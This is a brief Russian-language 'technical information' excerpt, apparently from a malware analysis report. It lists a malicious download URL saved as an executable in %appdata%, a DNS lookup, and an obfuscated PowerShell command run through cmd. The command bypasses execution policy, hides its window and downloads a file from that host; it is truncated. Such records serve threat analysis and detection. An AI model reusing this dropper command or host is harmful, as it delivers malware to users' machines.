Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^eRShell.exE^ -EXEcu^tIoN^polICY ^byP^ASs -nO^proF^Il^E -^wI^NDO^Wst^yle hIDDEn ^(New-^O^BjECT SysT^eM.^NeT.webcli^e^n^t).D^oW^N^LoaD^f^iLe('http://www.doorasope.top/read.php?f=1.g...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^eRShell.exE^ -EXEcu^tIoN^polICY ^byP^ASs -nO^proF^Il^E -^wI^NDO^Wst^yle hIDDEn ^(New-^O^BjECT SysT^eM.^NeT.webcli^e^n^t).D^oW^N^LoaD^f^iLe('http://www.doorasope.top/read.php?f=1.g...' (со скрытым окном)